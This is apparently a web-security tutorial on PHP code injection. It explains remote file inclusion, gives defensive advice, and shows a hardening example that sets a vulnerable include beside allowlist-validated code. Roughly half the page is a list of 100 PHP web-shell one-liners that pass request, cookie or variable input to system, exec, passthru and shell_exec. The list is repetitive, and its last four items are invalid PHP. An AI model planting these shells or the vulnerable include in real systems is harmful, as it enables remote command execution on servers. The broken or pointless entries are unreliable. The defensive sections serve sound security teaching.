What is PHP Code Injection
PHP code injection is a type of attack in which an attacker supplies input that a vulnerable web application ends up treating as PHP code. The injected code is executed by the server when the vulnerable page is requested, so it runs with the privileges of the web server process. This type of attack can be used to gain access to sensitive information, manipulate data, and even gain control over the server.
The most common way for an attacker to inject code into a vulnerable web application is through a vulnerability known as remote file inclusion or RFI, which arises when a file path passed to include or require is built from a request parameter. In an RFI attack, the attacker crafts a URL that points the include at a file they control and sends it to the server. The server fetches and executes that file as PHP, allowing the attacker to read sensitive data and manipulate the application as they wish.
Other injection methods exist alongside PHP code injection, such as SQL injection, in which an attacker places malicious SQL in input that the application concatenates into a database query. This type of attack can be used to gain access to sensitive information and manipulate data.
Regardless of how code injection is performed, it is important to take steps to protect your web application from this type of attack. This includes implementing secure coding practices, such as input validation, and using secure protocols, such as HTTPS. Additionally, keep your web application up to date with the latest security patches so that known code injection vulnerabilities are not left exposed.
Where To Test PHP Code Injection
1. Validate user input: Web applications should validate user input to ensure that malicious code is not being injected. The most reliable form is an allowlist: accept only values in the expected format (for example a fixed set of page names, or a pattern such as digits only) and reject everything else rather than trying to strip unexpected characters.
2. Use secure protocols: Using secure protocols, such as HTTPS, can help to prevent malicious code from being injected into a web application. Note that HTTPS protects the request in transit; it does not, on its own, stop injection through parameters that the application itself passes to include, require or a shell execution function.
3. Keep software up to date: It is important to ensure that your web application is up to date with the latest security patches. This can help to protect against code injection attacks.
4. Implement secure coding practices: Secure coding practices, such as input validation and never passing request data to include, require, eval, system, exec, passthru or shell_exec, can help to reduce the risk of code injection attacks.
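The RFI and command-execution sinks described above, each beside an allowlist-validated replacement, plus a configuration self-check for the settings that turn injected input into code execution. This is an added example and not code from the original page; the names PAGES, safeInclude, runReport and hardeningReport are hypothetical, and the ping command is only a stand-in for any program the application must run.

```php
<?php
declare(strict_types=1);

// Vulnerable: the include target comes straight from the query string. With
// allow_url_include enabled, a remote URL in ?page= is fetched and executed.
function vulnerableInclude(): void {
    include $_GET['page'];
}

// Hardened: the request selects a key, never a path. Anything outside the
// allowlist is rejected before it can reach the include sink.
const PAGES = ['home' => 'home.php', 'about' => 'about.php'];
function safeInclude(string $page): void {
    if (!array_key_exists($page, PAGES)) {
        http_response_code(400);
        return;
    }
    include __DIR__ . '/pages/' . PAGES[$page];
}

// Hardened command parameter: the program and its flags are fixed in code, the
// one free-form argument is validated against a strict pattern, and it is still
// wrapped with escapeshellarg() so that shell metacharacters are inert.
function runReport(string $host): string {
    if (!preg_match('/^[a-z0-9.-]{1,253}$/i', $host)) {
        throw new InvalidArgumentException('host fails allowlist pattern');
    }
    return shell_exec('/usr/bin/ping -c 1 ' . escapeshellarg($host)) ?? '';
}

// Deployment check: allow_url_include should be off, and the shell execution
// functions listed on this page should appear in disable_functions unless the
// application genuinely needs them. Every value should be true in production.
function hardeningReport(): array {
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    $report = [
        'allow_url_include_off' => !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
    ];
    foreach (['system', 'exec', 'passthru', 'shell_exec'] as $fn) {
        $report[$fn . '_disabled'] = in_array($fn, $disabled, true);
    }
    return $report;
}

foreach (hardeningReport() as $setting => $ok) {
    printf("%-24s %s\n", $setting, $ok ? 'ok' : 'NEEDS ATTENTION');
}
```

Run the script from the command line with the same php.ini the web server uses; a "NEEDS ATTENTION" line means a payload like those listed below would execute if it ever reached an include or shell sink.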
100 PHP Code Injection Payloads
1. <?php system($_GET['cmd']); ?>
2. <?php exec($_GET['cmd']); ?>
3. <?php passthru($_GET['cmd']); ?>
4. <?php echo shell_exec($_GET['cmd']); ?>
5. <?php system($_POST['cmd']); ?>
6. <?php exec($_POST['cmd']); ?>
7. <?php passthru($_POST['cmd']); ?>
8. <?php echo shell_exec($_POST['cmd']); ?>
9. <?php system($_REQUEST['cmd']); ?>
10. <?php exec($_REQUEST['cmd']); ?>
11. <?php passthru($_REQUEST['cmd']); ?>
12. <?php echo shell_exec($_REQUEST['cmd']); ?>
13. <?php system($_COOKIE['cmd']); ?>
14. <?php exec($_COOKIE['cmd']); ?>
15. <?php passthru($_COOKIE['cmd']); ?>
16. <?php echo shell_exec($_COOKIE['cmd']); ?>
17. <?php system($_SESSION['cmd']); ?>
18. <?php exec($_SESSION['cmd']); ?>
19. <?php passthru($_SESSION['cmd']); ?>
20. <?php echo shell_exec($_SESSION['cmd']); ?>
21. <?php system($_ENV['cmd']); ?>
22. <?php exec($_ENV['cmd']); ?>
23. <?php passthru($_ENV['cmd']); ?>
24. <?php echo shell_exec($_ENV['cmd']); ?>
25. <?php system($_SERVER['cmd']); ?>
26. <?php exec($_SERVER['cmd']); ?>
27. <?php passthru($_SERVER['cmd']); ?>
28. <?php echo shell_exec($_SERVER['cmd']); ?>
29. <?php system("$cmd"); ?>
30. <?php exec("$cmd"); ?>
31. <?php passthru("$cmd"); ?>
32. <?php echo shell_exec("$cmd"); ?>
33. <?php system("$cmd $param"); ?>
34. <?php exec("$cmd $param"); ?>
35. <?php passthru("$cmd $param"); ?>
36. <?php echo shell_exec("$cmd $param"); ?>
37. <?php system("cmd /c $cmd"); ?>
38. <?php exec("cmd /c $cmd"); ?>
39. <?php passthru("cmd /c $cmd"); ?>
40. <?php echo shell_exec("cmd /c $cmd"); ?>
41. <?php system("cmd /c $cmd $param"); ?>
42. <?php exec("cmd /c $cmd $param"); ?>
43. <?php passthru("cmd /c $cmd $param"); ?>
44. <?php echo shell_exec("cmd /c $cmd $param"); ?>
45. <?php system("/bin/bash -c $cmd"); ?>
46. <?php exec("/bin/bash -c $cmd"); ?>
47. <?php passthru("/bin/bash -c $cmd"); ?>
48. <?php echo shell_exec("/bin/bash -c $cmd"); ?>
49. <?php system("/bin/bash -c $cmd $param"); ?>
50. <?php exec("/bin/bash -c $cmd $param"); ?>
51. <?php passthru("/bin/bash -c $cmd $param"); ?>
52. <?php echo shell_exec("/bin/bash -c $cmd $param"); ?>
53. <?php system("/usr/bin/env $cmd"); ?>
54. <?php exec("/usr/bin/env $cmd"); ?>
55. <?php passthru("/usr/bin/env $cmd"); ?>
56. <?php echo shell_exec("/usr/bin/env $cmd"); ?>
57. <?php system("/usr/bin/env $cmd $param"); ?>
58. <?php exec("/usr/bin/env $cmd $param"); ?>
59. <?php passthru("/usr/bin/env $cmd $param"); ?>
60. <?php echo shell_exec("/usr/bin/env $cmd $param"); ?>
61. <?php system("/bin/sh -c $cmd"); ?>
62. <?php exec("/bin/sh -c $cmd"); ?>
63. <?php passthru("/bin/sh -c $cmd"); ?>
64. <?php echo shell_exec("/bin/sh -c $cmd"); ?>
65. <?php system("/bin/sh -c $cmd $param"); ?>
66. <?php exec("/bin/sh -c $cmd $param"); ?>
67. <?php passthru("/bin/sh -c $cmd $param"); ?>
68. <?php echo shell_exec("/bin/sh -c $cmd $param"); ?>
69. <?php system("/usr/bin/sh -c $cmd"); ?>
70. <?php exec("/usr/bin/sh -c $cmd"); ?>
71. <?php passthru("/usr/bin/sh -c $cmd"); ?>
72. <?php echo shell_exec("/usr/bin/sh -c $cmd"); ?>
73. <?php system("/usr/bin/sh -c $cmd $param"); ?>
74. <?php exec("/usr/bin/sh -c $cmd $param"); ?>
75. <?php passthru("/usr/bin/sh -c $cmd $param"); ?>
76. <?php echo shell_exec("/usr/bin/sh -c $cmd $param"); ?>
77. <?php system("/bin/bash -i -c $cmd"); ?>
78. <?php exec("/bin/bash -i -c $cmd"); ?>
79. <?php passthru("/bin/bash -i -c $cmd"); ?>
80. <?php echo shell_exec("/bin/bash -i -c $cmd"); ?>
81. <?php system("/bin/bash -i -c $cmd $param"); ?>
82. <?php exec("/bin/bash -i -c $cmd $param"); ?>
83. <?php passthru("/bin/bash -i -c $cmd $param"); ?>
84. <?php echo shell_exec("/bin/bash -i -c $cmd $param"); ?>
85. <?php system("/usr/bin/bash -i -c $cmd"); ?>
86. <?php exec("/usr/bin/bash -i -c $cmd"); ?>
87. <?php passthru("/usr/bin/bash -i -c $cmd"); ?>
88. <?php echo shell_exec("/usr/bin/bash -i -c $cmd"); ?>
89. <?php system("/usr/bin/bash -i -c $cmd $param"); ?>
90. <?php exec("/usr/bin/bash -i -c $cmd $param"); ?>
91. <?php passthru("/usr/bin/bash -i -c $cmd $param"); ?>
92. <?php echo shell_exec("/usr/bin/bash -i -c $cmd $param"); ?>
93. <?php system($cmd); ?>
94. <?php exec($cmd); ?>
95. <?php passthru($cmd); ?>
96. <?php echo shell_exec($cmd); ?>
97. <?php system($cmd $param); ?>
98. <?php exec($cmd $param); ?>
99. <?php passthru($cmd $param); ?>
100. <?php echo shell_exec($cmd $param); ?>